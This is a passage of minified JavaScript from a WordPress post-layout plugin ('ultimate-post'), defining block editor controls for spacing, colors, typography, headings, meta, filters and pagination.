Gap","ultimate-post")},{type:"separator",key:"spaceSep"},{type:"dimension",key:"wrapOuterPadding",label:__("Padding","ultimate-post"),step:1,unit:!0,responsive:!0},{type:"dimension",key:"wrapMargin",label:__("Margin","ultimate-post"),step:1,unit:!0,responsive:!0}],k=[{type:"range",key:"contenWraptWidth",min:0,max:800,step:1,unit:!0,responsive:!0,label:__("Width","ultimate-post")},{type:"range",key:"contenWraptHeight",min:0,max:500,step:1,unit:!0,responsive:!0,label:__("Height","ultimate-post")},{type:"tab",content:[{name:"normal",title:__("Normal","ultimate-post"),options:[{type:"color",key:"contentWrapBg",label:__("Background Color","ultimate-post")},{type:"border",key:"contentWrapBorder",label:__("Border","ultimate-post")},{type:"dimension",key:"contentWrapRadius",label:__("Border Radius","ultimate-post"),step:1,unit:!0,responsive:!0},{type:"boxshadow",key:"contentWrapShadow",label:__("BoxShadow","ultimate-post")}]},{name:"hover",title:__("Hover","ultimate-post"),options:[{type:"color",key:"contentWrapHoverBg",label:__("Hover Bg Color","ultimate-post")},{type:"border",key:"contentWrapHoverBorder",label:__("Hover Border","ultimate-post")},{type:"dimension",key:"contentWrapHoverRadius",label:__("Hover Radius","ultimate-post"),step:1,unit:!0,responsive:!0},{type:"boxshadow",key:"contentWrapHoverShadow",label:__("Hover BoxShadow","ultimate-post")}]}]},{type:"dimension",key:"contentWrapInnerPadding",label:__("Inner Padding","ultimate-post"),step:1,unit:!0,responsive:!0},{type:"dimension",key:"contentWrapPadding",label:__("Padding","ultimate-post"),step:1,unit:!0,responsive:!0}],w=[{type:"range",key:"headerWidth",min:0,max:600,step:1,responsive:!0,unit:["px","em","rem","%"],label:__("Width","ultimate-post")},{type:"tab",content:[{name:"normal",title:__("Normal","ultimate-post"),options:[{type:"color",key:"headerWrapBg",label:__("Background Color","ultimate-post")},{type:"border",key:"headerWrapBorder",label:__("Border","ultimate-post")},{type:"dimension",key:"headerWrapRadius",label:__("Border Radius","ultimate-post"),step:1,unit:!0,responsive:!0}]},{name:"hover",title:__("Hover","ultimate-post"),options:[{type:"color",key:"headerWrapHoverBg",label:__("Hover Bg Color","ultimate-post")},{type:"border",key:"headerWrapHoverBorder",label:__("Hover Border","ultimate-post")},{type:"dimension",key:"headerWrapHoverRadius",label:__("Hover Radius","ultimate-post"),step:1,unit:!0,responsive:!0}]}]},{type:"range",key:"headerSpaceX",min:-100,max:100,step:1,responsive:!0,unit:["px","em","rem","%"],label:__("Space X","ultimate-post")},{type:"range",key:"headerSpaceY",min:0,max:150,step:1,responsive:!0,label:__("Space Y","ultimate-post")},{type:"dimension",key:"headerWrapPadding",label:__("Padding","ultimate-post"),step:1,unit:!0,responsive:!0}],x=[{type:"select",key:"vidIconPosition",options:[{label:"Center",value:"center"},{label:"Bottom Right",value:"bottomRight"},{label:"Bottom Left",value:"bottomLeft"},{label:"Top Right",value:"topRight"},{label:"Top Left",value:"topLeft"},{label:"Right Middle",value:"rightMiddle"},{label:"Left Middle",value:"leftMiddle"}],label:__("Video Icon Position","ultimate-post")},{type:"color",key:"popupIconColor",label:__("Icon Color","ultimate-post")},{type:"color",key:"popupHovColor",label:__("Icon Hover Color","ultimate-post")},{type:"range",key:"iconSize",label:__("Icon Size","ultimate-post"),min:0,max:500,step:1,unit:!0,responsive:!0},{type:"separator"},{type:"toggle",key:"popupAutoPlay",label:__("Enable Popup Auto Play","ultimate-post")},{type:"toggle",key:"enablePopup",pro:!0,label:__("Enable Video Popup","ultimate-post")},{type:"range",key:"popupWidth",label:__("Popup Video Width","ultimate-post"),min:0,max:100,step:1,unit:!1,responsive:!0},{type:"separator"},{type:"color",key:"closeIconColor",label:__("Close Icon Color","ultimate-post")},{type:"color",key:"closeHovColor",label:__("Close Hover Color","ultimate-post")},{type:"range",key:"closeSize",label:__("Close Icon Size","ultimate-post"),min:0,max:200,step:1,unit:!0,responsive:!0},{type:"toggle",key:"enablePopupTitle",label:__("Popup Title Enable","ultimate-post")},{type:"color",key:"popupTitleColor",label:__("Title Color","ultimate-post")}],T=[{type:"tag",key:"titleTag",label:__("Title Tag","ultimate-post"),options:[{value:"h1",label:__("H1","ultimate-post")},{value:"h2",label:__("H2","ultimate-post")},{value:"h3",label:__("H3","ultimate-post")},{value:"h4",label:__("H4","ultimate-post")},{value:"h5",label:__("H5","ultimate-post")},{value:"h6",label:__("H6","ultimate-post")},{value:"span",label:__("span","ultimate-post")},{value:"div",label:__("div","ultimate-post")}]},{type:"toggle",key:"titlePosition",label:__("Meta Under Title","ultimate-post")},{type:"range",key:"titleLength",min:0,max:30,step:1,label:__("Max Length","ultimate-post")},{type:"select",key:"titleStyle",label:__("Title Hover Effects","ultimate-post"),options:[{value:"none",label:__("None","ultimate-post")},{value:"style1",label:__("On Hover Underline","ultimate-post"),pro:!0},{value:"style2",label:__("On Hover Wave","ultimate-post"),pro:!0},{value:"style3",label:__("Wave","ultimate-post"),pro:!0},{value:"style4",label:__("underline","ultimate-post"),pro:!0},{value:"style5",label:__("underline and wave","ultimate-post"),pro:!0},{value:"style6",label:__("Underline Background","ultimate-post"),pro:!0},{value:"style7",label:__("Underline Right To Left","ultimate-post"),pro:!0},{value:"style8",label:__("Underline center","ultimate-post"),pro:!0},{value:"style9",label:__("Underline Background 2","ultimate-post"),pro:!0},{value:"style10",label:__("Underline Hover Spacing","ultimate-post"),pro:!0},{value:"style11",label:__("Hover word spacing","ultimate-post"),pro:!0}]},{type:"typography",key:"titleTypo",label:__("Typography","ultimate-post")},{type:"color",key:"titleBackground",label:__("Title BG Color","ultimate-post")},{type:"color",key:"titleColor",label:__("Color","ultimate-post")},{type:"color",key:"titleHoverColor",label:__("Hover Color","ultimate-post")},{type:"color",key:"titleAnimColor",label:__("Animation Color","ultimate-post")},{type:"dimension",key:"titlePadding",label:__("Padding","ultimate-post"),step:1,unit:!0,responsive:!0}],_=(__("Title Tag","ultimate-post"),__("H1","ultimate-post"),__("H2","ultimate-post"),__("H3","ultimate-post"),__("H4","ultimate-post"),__("H5","ultimate-post"),__("H6","ultimate-post"),__("span","ultimate-post"),__("div","ultimate-post"),__("Color","ultimate-post"),__("Hover Color","ultimate-post"),__("Typography","ultimate-post"),__("Padding","ultimate-post"),[{type:"text",key:"prefixText",label:__("Prefix Text","ultimate-post")},{type:"color",key:"prefixColor",label:__("Color","ultimate-post")},{type:"typography",key:"prefixTypo",label:__("Typography","ultimate-post")},{type:"dimension",key:"prefixPadding",label:__("Padding","ultimate-post"),step:1,unit:!0,responsive:!0}]),C=[{type:"select",key:"septStyle",label:__("Border Style","ultimate-post"),beside:!0,options:[{value:"none",label:__("None","ultimate-post")},{value:"solid",label:__("Solid","ultimate-post")},{value:"dashed",label:__("Dashed","ultimate-post")},{value:"dotted",label:__("Dotted","ultimate-post")},{value:"double",label:__("Double","ultimate-post")}]},{type:"color",key:"septColor",label:__("Border Color","ultimate-post")},{type:"range",key:"septSize",min:0,max:20,step:1,label:__("Border Size","ultimate-post")},{type:"range",key:"septSpace",min:0,max:80,step:1,responsive:!0,label:__("Spacing","ultimate-post")}],E=[{type:"text",key:"advanceId",label:__("Custom Selector ( ID )","ultimate-post")},{type:"range",key:"advanceZindex",min:-100,max:1e4,step:1,label:__("Z-index","ultimate-post")},{type:"dimension",key:"wrapMargin",label:__("Margin","ultimate-post"),step:1,unit:!0,responsive:!0},{type:"dimension",key:"wrapOuterPadding",label:__("Padding","ultimate-post"),step:1,unit:!0,responsive:!0},{type:"tab",content:[{name:"normal",title:__("Normal","ultimate-post"),options:[{type:"color2",key:"wrapBg",label:__("Background","ultimate-post")},{type:"border",key:"wrapBorder",label:__("Border","ultimate-post")},{type:"boxshadow",key:"wrapShadow",label:__("BoxShadow","ultimate-post")},{type:"dimension",key:"wrapRadius",label:__("Border Radius","ultimate-post"),step:1,unit:!0,responsive:!0}]},{name:"hover",title:__("Hover","ultimate-post"),options:[{type:"color2",key:"wrapHoverBackground",label:__("Background","ultimate-post")},{type:"border",key:"wrapHoverBorder",label:__("Hover Border","ultimate-post")},{type:"boxshadow",key:"wrapHoverShadow",label:__("Hover BoxShadow","ultimate-post")},{type:"dimension",key:"wrapHoverRadius",label:__("Hover Radius","ultimate-post"),step:1,unit:!0,responsive:!0}]}]}],S=[{type:"select",key:"TaxAnimation",label:__("Hover Animation","ultimate-post"),options:[{value:"none",label:__("No Animation","ultimate-post")},{value:"zoomIn",label:__("Zoom In","ultimate-post")},{value:"zoomOut",label:__("Zoom Out","ultimate-post")},{value:"opacity",label:__("Opacity","ultimate-post")},{value:"slideLeft",label:__("Slide Left","ultimate-post")},{value:"slideRight",label:__("Slide Right","ultimate-post")}]},{type:"toggle",key:"customTaxColor",label:__("Taxonomy Specific Color","ultimate-post"),pro:!0},{type:"linkbutton",key:"seperatorTaxLink",placeholder:__("Choose Color","ultimate-post"),label:__("Taxonomy Specific (Pro)","ultimate-post"),text:"Choose Color"},{type:"tab",content:[{name:"normal",title:__("Normal","ultimate-post"),options:[{type:"color",key:"TaxWrapBg",label:__("Background Color","ultimate-post")},{type:"range",key:"customOpacityTax",min:0,max:1,step:.05,label:__("Overlay Opacity","ultimate-post")},{type:"border",key:"TaxWrapBorder",label:__("Border","ultimate-post")},{type:"boxshadow",key:"TaxWrapShadow",label:__("BoxShadow","ultimate-post")},{type:"dimension",key:"TaxWrapRadius",label:__("Border Radius","ultimate-post"),step:1,unit:!0,responsive:!0}]},{name:"hover",title:__("Hover","ultimate-post"),options:[{type:"color",key:"TaxWrapHoverBg",label:__("Hover Bg Color","ultimate-post")},{type:"range",key:"customTaxOpacityHover",min:0,max:1,step:.05,label:__("Hover Opacity","ultimate-post")},{type:"border",key:"TaxWrapHoverBorder",label:__("Hover Border","ultimate-post")},{type:"boxshadow",key:"TaxWrapHoverShadow",label:__("Hover BoxShadow","ultimate-post")},{type:"dimension",key:"TaxWrapHoverRadius",label:__("Hover Radius","ultimate-post"),step:1,unit:!0,responsive:!0}]}]},{type:"dimension",key:"TaxWrapPadding",label:__("Padding","ultimate-post"),step:1,unit:!0,responsive:!0}],P=[{data:{type:"tag",key:"relation",label:__("Multiple Filter Relation","ultimate-post"),options:[{value:"AND",label:__("AND","ultimate-post")},{value:"OR",label:__("OR","ultimate-post")}]}},{data:{type:"alignment",key:"align",label:__("Alignment","ultimate-post"),responsive:!0,options:["flex-start","center","flex-end"],icons:["left","center","right"]}},{data:{type:"range",key:"gapChild",min:0,max:120,step:1,responsive:!0,unit:["px","em","rem"],label:__("Gap","ultimate-post")}},{data:{type:"range",key:"spacingTop",min:0,max:120,step:1,responsive:!0,unit:["px","em","rem"],label:__("Spacing Top","ultimate-post")}},{data:{type:"range",key:"spacingBottom",min:0,max:120,step:1,responsive:!0,unit:["px","em","rem"],label:__("Spacing Bottom","ultimate-post")}}],L={...i,pro:!0},I={type:"select",key:"metaStyle",label:__("Meta Style","ultimate-post"),options:[{value:"noIcon",label:__("No Icon","ultimate-post")},{value:"icon",label:__("With Icon","ultimate-post")},{value:"style2",label:__("Style2","ultimate-post")},{value:"style3",label:__("Style3","ultimate-post")},{value:"style4",label:__("Style4","ultimate-post")},{value:"style5",label:__("Style5","ultimate-post")},{value:"style6",label:__("Style6","ultimate-post")}],pro:!0},B={type:"select",key:"metaSeparator",label:__("Separator","ultimate-post"),options:[{value:"dot",label:__("Dot","ultimate-post")},{value:"slash",label:__("Slash","ultimate-post")},{value:"doubleslash",label:__("Double Slash","ultimate-post")},{value:"close",label:__("Close","ultimate-post")},{value:"dash",label:__("Dash","ultimate-post")},{value:"verticalbar",label:__("Vertical Bar","ultimate-post")},{value:"emptyspace",label:__("Empty","ultimate-post")}],pro:!0},U={...i,key:"metaListSmall",label:__("Small Item Meta","ultimate-post"),pro:!0},M={type:"select",key:"catPosition",label:__("Category Position","ultimate-post"),options:[{value:"aboveTitle",label:__("Above Title","ultimate-post")},{value:"topLeft",label:__("Over Image(Top Left)","ultimate-post")},{value:"topRight",label:__("Over Image(Top Right)","ultimate-post")},{value:"bottomLeft",label:__("Over Image(Bottom Left)","ultimate-post")},{value:"bottomRight",label:__("Over Image(Bottom Right)","ultimate-post")},{value:"centerCenter",label:__("Over Image(Center)","ultimate-post")}],pro:!0},A={type:"select",key:"filterType",label:__("Filter Type","ultimate-post"),options:[],pro:!0},H={type:"select",key:"filterValue",label:__("Filter Value","ultimate-post"),options:[],multiple:!0,pro:!0},N={type:"select",key:"navPosition",label:__("Navigation Position","ultimate-post"),options:[{value:"topRight",label:__("Top Right","ultimate-post")},{value:"bottomLeft",label:__("Bottom","ultimate-post")}],pro:!0},j=[{type:"tag",key:"overlayContentPosition",label:__("Content Position","ultimate-post"),disabled:!0,options:[{value:"topPosition",label:__("Top","ultimate-post")},{value:"middlePosition",label:__("Middle","ultimate-post")},{value:"bottomPosition",label:__("Bottom","ultimate-post")}]},{type:"color2",key:"overlayBgColor",label:__("Content Background","ultimate-post"),pro:!0},{type:"dimension",key:"overlayWrapPadding",label:__("Padding","ultimate-post"),step:1,unit:!0,responsive:!0}],Z=[{type:"select",key:"imgAnimation",label:__("Hover Animation","ultimate-post"),options:[{value:"none",label:__("No Animation","ultimate-post")},{value:"zoomIn",label:__("Zoom In","ultimate-post")},{value:"zoomOut",label:__("Zoom Out","ultimate-post")},{value:"opacity",label:__("Opacity","ultimate-post")},{value:"roateLeft",label:__("Rotate Left","ultimate-post")},{value:"rotateRight",label:__("Rotate Right","ultimate-post")},{value:"slideLeft",label:__("Slide Left","ultimate-post")},{value:"slideRight",label:__("Slide Right","ultimate-post")}]},{type:"range",key:"imgWidth",min:0,max:2e3,step:1,responsive:!0,unit:["px","em","rem","%"],label:__("Width","ultimate-post")},{type:"range",key:"imgHeight",min:0,max:2e3,step:1,responsive:!0,unit:["px","em","rem","%"],label:__("Height","ultimate-post")},{type:"tag",key:"imageScale",label:__("Image scale","ultimate-post"),options:[{value:"",label:__("None","ultimate-post")},{value:"cover",label:__("Cover","ultimate-post")},{value:"contain",label:__("Contain","ultimate-post")},{value:"fill",label:__("Fill","ultimate-post")}]},{type:"tab",key:"imgTab",content:[{name:"Normal",title:__("Normal","ultimate-post"),options:[{type:"range",key:"imgGrayScale",label:__("Gray Scale","ultimate-post"),min:0,max:100,step:1,unit:["%"],responsive:!0},{type:"dimension",key:"imgRadius",label:__("Radius","ultimate-post"),step:1,unit:!0,responsive:!0},{type:"boxshadow",key:"imgShadow",label:__("BoxShadow","ultimate-post")}]},{name:"tab2",title:__("Hover","ultimate-post"),options:[{type:"range",key:"imgHoverGrayScale",label:__("Hover Gray Scale","ultimate-post"),min:0,max:100,step:1,unit:["%"],responsive:!0},{type:"dimension",key:"imgHoverRadius",label:__("Hover Radius","ultimate-post"),step:1,unit:!0,responsive:!0},{type:"boxshadow",key:"imgHoverShadow",label:__("Hover BoxShadow","ultimate-post")}]}]},{type:"dimension",key:"imgMargin",label:__("Margin","ultimate-post"),step:1,unit:!0,responsive:!0},{type:"toggle",key:"imgOverlay",label:__("Overlay","ultimate-post")},{type:"select",key:"imgOverlayType",label:__("Overlay Type","ultimate-post"),options:[{value:"default",label:__("Default","ultimate-post")},{value:"simgleGradient",label:__("Simple Gradient","ultimate-post")},{value:"multiColour",label:__("Multi Color","ultimate-post")},{value:"flat",label:__("Flat","ultimate-post")},{value:"custom",label:__("Custom","ultimate-post")}]},{type:"color2",key:"overlayColor",label:__("Custom Color","ultimate-post")},{type:"range",key:"imgOpacity",min:0,max:1,step:.05,label:__("Overlay Opacity","ultimate-post")},{type:"toggle",key:"imgSrcset",label:__("Enable Srcset","ultimate-post"),pro:!0},{type:"toggle",key:"imgLazy",label:__("Enable Lazy Loading","ultimate-post"),pro:!0}],O=[{type:"toggle",key:"filterBelowTitle",label:__("Below Title","ultimate-post")},{type:"select",key:"filterType",label:__("Filter Type","ultimate-post"),options:[]},{type:"search",key:"filterValue",label:__("Filter Value","ultimate-post"),multiple:!0,search:"taxvalue"},{type:"text",key:"filterText",label:__("All Content Text","ultimate-post")},{type:"toggle",key:"filterMobile",label:__("Enable Dropdown","ultimate-post"),pro:!0},{type:"text",key:"filterMobileText",label:__("Menu Text","ultimate-post"),help:__("Mobile Device Filter Menu Text","ultimate-post")},{type:"typography",key:"fliterTypo",label:__("Typography","ultimate-post")},{type:"alignment",key:"filterAlign",responsive:!0,label:__("Alignment","ultimate-post"),disableJustify:!0},{type:"tab",key:"fTab",content:[{name:"normal",title:__("Normal","ultimate-post"),options:[{type:"color",key:"filterColor",label:__("Color","ultimate-post")},{type:"color",key:"filterBgColor",label:__("Background Color","ultimate-post")},{type:"border",key:"filterBorder",label:__("Border","ultimate-post")}]},{name:"hover",title:__("Hover","ultimate-post"),options:[{type:"color",key:"filterHoverColor",label:__("Hover Color","ultimate-post")},{type:"color",key:"filterHoverBgColor",label:__("Hover Bg Color","ultimate-post")},{type:"border",key:"filterHoverBorder",label:__("Hover Border","ultimate-post")}]}]},{type:"dimension",key:"filterRadius",label:__("Border Radius","ultimate-post"),step:1,unit:!0,responsive:!0},{type:"color",key:"filterDropdownColor",label:__("Dropdown Text Color","ultimate-post")},{type:"color",key:"filterDropdownHoverColor",label:__("Dropdown Hover Color","ultimate-post")},{type:"color",key:"filterDropdownBg",label:__("Dropdown Background","ultimate-post")},{type:"range",key:"filterDropdownRadius",min:0,max:300,step:1,responsive:!0,unit:["px","em","rem","%"],label:__("Dropdown Radius","ultimate-post")},{type:"dimension",key:"filterDropdownPadding",label:__("Dropdown Padding","ultimate-post"),step:1,unit:!0,responsive:!0},{type:"dimension",key:"fliterSpacing",label:__("Margin","ultimate-post"),step:1,unit:!0,responsive:!0},{type:"dimension",key:"fliterPadding",label:__("Padding","ultimate-post"),step:1,unit:!0,responsive:!0}],R=[{type:"tag",key:"paginationType",label:__("Pagination Type","ultimate-post"),options:[{value:"loadMore",label:__("Loadmore","ultimate-post")},{value:"navigation",label:__("Navigation","ultimate-post")},{value:"pagination",label:__("Pagination","ultimate-post")}]},{type:"text",key:"loadMoreText",label:__("Loadmore Text","ultimate-post")},{type:"text",key:"paginationText",label:__("Pagination Text","ultimate-post")},{type:"alignment",key:"pagiAlign",responsive:!0,label:__("Alignment","ultimate-post"),disableJustify:!0},{type:"select",key:"paginationNav",label:__("Pagination","ultimate-post"),options:[{value:"textArrow",label:__("Text & Arrow","ultimate-post")},{value:"onlyarrow",label:__("Only Arrow","ultimate-post")}]},{type:"toggle",key:"paginationAjax",label:__("Ajax Pagination","ultimate-post")},{type:"select",key:"navPosition",label:__("Navigation Position","ultimate-post"),options:[{value:"topRight",label:__("Top Right","ultimate-post")},{value:"bottomLeft",label:__("Bottom","ultimate-post")}]},{type:"typography",key:"pagiTypo",label:__("Typography","ultimate-post")},{type:"range",key:"pagiArrowSize",min:0,max:100,step:1,responsive:!0,label:__("Arrow Size","ultimate-post")},{type:"tab",key:"pagiTab",content:[{name:"normal",title:__("Normal","ultimate-post"),options:[{type:"color",key:"pagiColor",label:__("Color","ultimate-post"),clip:!0},{type:"color2",key:"pagiBgColor",label:__("Background Color","ultimate-post")},{type:"border",key:"pagiBorder",label:__("Border","ultimate-post")},{type:"boxshadow",key:"pagiShadow",label:__("BoxShadow","ultimate-post")},{type:"dimension",key:"pagiRadius",label:__("Border Radius","ultimate-post"),step:1,unit:!0,responsive:!0}]},{name:"hover",title:__("Hover","ultimate-post"),options:[{type:"color",key:"pagiHoverColor",label:__("Hover Color","ultimate-post"),clip:!0},{type:"color2",key:"pagiHoverbg",label:__("Hover Bg Color","ultimate-post")},{type:"border",key:"pagiHoverBorder",label:__("Hover Border","ultimate-post")},{type:"boxshadow",key:"pagiHoverShadow",label:__("BoxShadow","ultimate-post")},{type:"dimension",key:"pagiHoverRadius",label:__("Hover Radius","ultimate-post"),step:1,unit:!0,responsive:!0}]}]},{type:"dimension",key:"pagiMargin",label:__("Margin","ultimate-post"),step:1,unit:!0,responsive:!0},{type:"dimension",key:"navMargin",label:__("Margin","ultimate-post"),step:1,unit:!0,responsive:!0},{type:"dimension",key:"pagiPadding",label:__("Padding","ultimate-post"),step:1,unit:!0,responsive:!0}],D=[{type:(0,o.o6)()?"toggle":"",label:__("Enable Dynamic Content","ultimate-post"),key:"dcEnabled",help:__("Insert dynamic data & custom fields that update automatically.","ultimate-post")},{type:"advFilterEnable",key:"advFilterEnable",label:__("Advanced Filter","ultimate-post")},{type:"advPagiEnable",key:"advPaginationEnable",label:__("Advanced Pagination","ultimate-post")},{type:"toggle",key:"showImage",label:__("Image","ultimate-post")},{type:"toggle",key:"titleShow",label:__("Title","ultimate-post")},{type:"toggle",key:"metaShow",label:__("Meta","ultimate-post")},{type:"toggle",key:"catShow",label:__("Taxonomy/Category","ultimate-post")},{type:"toggle",key:"excerptShow",label:__("Excerpt","ultimate-post")},{type:"toggle",key:"readMore",label:__("Read More","ultimate-post")},{type:"toggle",key:"headingShow",label:__("Heading","ultimate-post")},{type:"toggle",key:"filterShow",label:__("Filter","ultimate-post")},{type:"toggle",key:"paginationShow",label:__("Pagination","ultimate-post")}],z=[{type:"toggle",key:"titleShow",label:__("Title","ultimate-post")},{type:"toggle",key:"metaShow",label:__("Meta","ultimate-post")},{type:"toggle",key:"catShow",label:__("Taxonomy/Category","ultimate-post")},{type:"toggle",key:"excerptShow",label:__("Excerpt","ultimate-post")},{type:"toggle",key:"readMore",label:__("Read More","ultimate-post")},{type:"toggle",key:"arrows",label:__("Arrows","ultimate-post")},{type:"toggle",key:"dots",label:__("Dots","ultimate-post")},{type:"toggle",key:"headingShow",label:__("Heading","ultimate-post")}],F=[{type:"toggle",key:"showSeoMeta",label:__("SEO Meta","ultimate-post"),pro:!0,help:__("Show Meta from Yoast, RankMath, AIO, SEOPress and Squirrly. Make sure that PostX > Addons > [SEO Plugin] is Enabled.","ultimate-post")},{type:"toggle",key:"showFullExcerpt",label:__("Show Full Excerpt","ultimate-post"),help:__("Show Excerpt from Post Meta Box.","ultimate-post")},{type:"range",key:"excerptLimit",min:0,max:500,step:1,label:__("Excerpt Limit","ultimate-post"),help:__("Excerpt Limit from Post Content.","ultimate-post")},{type:"typography",key:"excerptTypo",label:__("Typography","ultimate-post")},{type:"color",key:"excerptColor",label:__("Color","ultimate-post")},{type:"dimension",key:"excerptPadding",label:__("Padding","ultimate-post"),step:1,unit:!0,responsive:!0}],W=[{type:"tag",key:"metaPosition",inline:!0,label:__("Meta Position","ultimate-post"),options:[{value:"top",label:__("Top","ultimate-post")},{value:"bottom",label:__("Bottom","ultimate-post")}]},{type:"select",key:"metaStyle",label:__("Author Style","ultimate-post"),options:[{value:"noIcon",label:__("No Icon","ultimate-post")},{value:"icon",label:__("With Icon","ultimate-post")},{value:"style2",label:__("Style2","ultimate-post")},{value:"style3",label:__("Style3","ultimate-post")},{value:"style4",label:__("Style4","ultimate-post")},{value:"style5",label:__("Style5","ultimate-post")},{value:"style6",label:__("Style6","ultimate-post")}]},{type:"select",key:"metaSeparator",label:__("Separator","ultimate-post"),options:[{value:"dot",label:__("Dot","ultimate-post")},{value:"slash",label:__("Slash","ultimate-post")},{value:"doubleslash",label:__("Double Slash","ultimate-post")},{value:"close",label:__("Close","ultimate-post")},{value:"dash",label:__("Dash","ultimate-post")},{value:"verticalbar",label:__("Vertical Bar","ultimate-post")},{value:"emptyspace",label:__("Empty","ultimate-post")}]},i,{type:"toggle",key:"authorLink",label:__("Enable Author Link","ultimate-post")},{type:"text",key:"metaMinText",label:__("Minute Text","ultimate-post")},{type:"text",key:"metaAuthorPrefix",label:__("Author Prefix Text","ultimate-post")},{...i,key:"metaListSmall",label:__("Small Item Meta","ultimate-post")},{type:"select",key:"metaDateFormat",label:__("Date/Time Format","ultimate-post"),options:[{value:"M j, Y",label:"Feb 7, 2022"},{value:"default_date",label:"WordPress Default Date Format",pro:!0},{value:"default_date_time",label:"WordPress Default Date & Time Format",pro:!0},{value:"g:i A",label:"1:12 PM",pro:!0},{value:"F j, Y",label:"February 7, 2022",pro:!0},{value:"F j, Y g:i A",label:"February 7, 2022 1:12 PM",pro:!0},{value:"M j, Y g:i A",label:"Feb 7, 2022 1:12 PM",pro:!0},{value:"j M Y",label:"7 Feb 2022",pro:!0},{value:"j M Y g:i A",label:"7 Feb 2022 1:12 PM",pro:!0},{value:"j F Y",label:"7 February 2022",pro:!0},{value:"j F Y g:i A",label:"7 February 2022 1:12 PM",pro:!0},{value:"j. M Y",label:"7. Feb 2022",pro:!0},{value:"j. M Y | H:i",label:"7. Feb 2022 | 1:12",pro:!0},{value:"j. F Y",label:"7. February 2022",pro:!0},{value:"j.m.Y",label:"7.02.2022",pro:!0},{value:"j.m.Y g:i A",label:"7.02.2022 1:12 PM",pro:!0}]},{type:"typography",key:"metaTypo",label:__("Typography","ultimate-post")},{type:"color",key:"metaColor",label:__("Color","ultimate-post")},{type:"color",key:"metaHoverColor",label:__("Hover Color","ultimate-post")},{type:"color",key:"metaBg",label:__("Background","ultimate-post")},{type:"color",key:"metaSeparatorColor",label:__("Separator Color","ultimate-post")},{type:"range",key:"metaSpacing",label:__("Meta Spacing Between","ultimate-post"),min:0,max:50,step:1,unit:!0,responsive:!0},{type:"border",key:"metaBorder",label:__("Border","ultimate-post")},{type:"dimension",key:"metaMargin",label:__("Margin","ultimate-post"),step:1,unit:!0,responsive:!0},{type:"dimension",key:"metaPadding",label:__("Padding","ultimate-post"),step:1,unit:!0,responsive:!0}],V=[{type:"alignment",key:"headingAlign",label:__("Alignment","ultimate-post"),disableJustify:!0},{type:"select",key:"headingStyle",label:__("Heading Style","ultimate-post"),image:!0,options:[{value:"style1",label:__("Style 1","ultimate-post"),img:"assets/img/layouts/heading/hstyle1.png"},{value:"style2",label:__("Style 2","ultimate-post"),img:"assets/img/layouts/heading/hstyle2.png"},{value:"style3",label:__("Style 3","ultimate-post"),img:"assets/img/layouts/heading/hstyle3.png"},{value:"style4",label:__("Style 4","ultimate-post"),img:"assets/img/layouts/heading/hstyle4.png"},{value:"style5",label:__("Style 5","ultimate-post"),img:"assets/img/layouts/heading/hstyle5.png"},{value:"style6",label:__("Style 6","ultimate-post"),img:"assets/img/layouts/heading/hstyle6.png"},{value:"style7",label:__("Style 7","ultimate-post"),img:"assets/img/layouts/heading/hstyle7.png"},{value:"style8",label:__("Style 8","ultimate-post"),img:"assets/img/layouts/heading/hstyle8.png"},{value:"style9",label:__("Style 9","ultimate-post"),img:"assets/img/layouts/heading/hstyle9.png"},{value:"style10",label:__("Style 10","ultimate-post"),img:"assets/img/layouts/heading/hstyle10.png"},{value:"style11",label:__("Style 11","ultimate-post"),img:"assets/img/layouts/heading/hstyle11.png"},{value:"style12",label:__("Style 12","ultimate-post"),img:"assets/img/layouts/heading/hstyle12.png"},{value:"style13",label:__("Style 13","ultimate-post"),img:"assets/img/layouts/heading/hstyle13.png"},{value:"style14",label:__("Style 14","ultimate-post"),img:"assets/img/layouts/heading/hstyle14.png"},{value:"style15",label:__("Style 15","ultimate-post"),img:"assets/img/layouts/heading/hstyle15.png"},{value:"style16",label:__("Style 16","ultimate-post"),img:"assets/img/layouts/heading/hstyle16.png"},{value:"style17",label:__("Style 17","ultimate-post"),img:"assets/img/layouts/heading/hstyle17.png"},{value:"style18",label:__("Style 18","ultimate-post"),img:"assets/img/layouts/heading/hstyle18.png"},{value:"style19",label:__("Style 19","ultimate-post"),img:"assets/img/layouts/heading/hstyle19.png"},{value:"style20",label:__("Style 20","ultimate-post"),img:"assets/img/layouts/heading/hstyle20.png"},{value:"style21",label:__("Style 21","ultimate-post"),img:"assets/img/layouts/heading/hstyle21.png"}]},{type:"tag",key:"headingTag",label:__("Heading Tag","ultimate-post"),options:[{value:"h1",label:"H1"},{value:"h2",label:"H2"},{value:"h3",label:"H3"},{value:"h4",label:"H4"},{value:"h5",label:"H5"},{value:"h6",label:"H6"},{value:"span",label:"span"},{value:"p",label:"p"}]},{type:"text",key:"headingBtnText",label:__("Button Text","ultimate-post")},{type:"text",key:"headingURL",label:__("Heading URL","ultimate-post"),disableIf:()=>(0,o.o6)()},{type:"typography",key:"headingTypo",label:__("Heading Typography","ultimate-post")},{type:"color",key:"headingColor",label:__("Heading Color","ultimate-post")},{type:"color",key:"headingBg",label:__("Heading Background","ultimate-post")},{type:"color",key:"headingBg2",label:__("Heading Background 2","ultimate-post")},{type:"color",key:"headingBorderBottomColor",label:__("Heading Border Color","ultimate-post"),clip:!0},{type:"color",key:"headingBorderBottomColor2",label:__("Heading Border Color 2","ultimate-post"),clip:!0},{type:"range",key:"headingBorder",label:__("Heading Border Size","ultimate-post"),min:1,max:20,step:1},{type:"typography",key:"headingBtnTypo",label:__("Heading Button Typography","ultimate-post")},{type:"color",key:"headingBtnColor",label:__("Heading Button Color","ultimate-post")},{type:"color",key:"headingBtnHoverColor",label:__("Heading Button Hover Color","ultimate-post")},{type:"range",key:"headingSpacing",label:__("Heading Spacing","ultimate-post"),min:1,max:150,step:1,unit:!0,responsive:!0},{type:"dimension",key:"headingRadius",label:__("Heading Border Radius","ultimate-post"),step:1,unit:!0,responsive:!0},{type:"dimension",key:"headingPadding",label:__("Heading Padding","ultimate-post"),step:1,unit:!0,responsive:!0},{type:"toggle",key:"subHeadingShow",label:__("Sub Heading","ultimate-post")},{type:"typography",key:"subHeadingTypo",label:__("Sub Heading Typography","ultimate-post")},{type:"color",key:"subHeadingColor",label:__("Sub Heading Color","ultimate-post")},{type:"dimension",key:"subHeadingSpacing",label:__("Sub Heading Spacing","ultimate-post"),step:1,unit:!0,responsive:!0},{type:"toggle",key:"enableWidth",label:__("Sub Heading Custom Width","ultimate-post")},{type:"range",key:"customWidth",label:__("Sub Heading Max Width","ultimate-post"),min:1,max:1e3,step:1,unit:!0,responsive:!0}],G=[{type:"text",key:"readMoreText",label:__("Read More 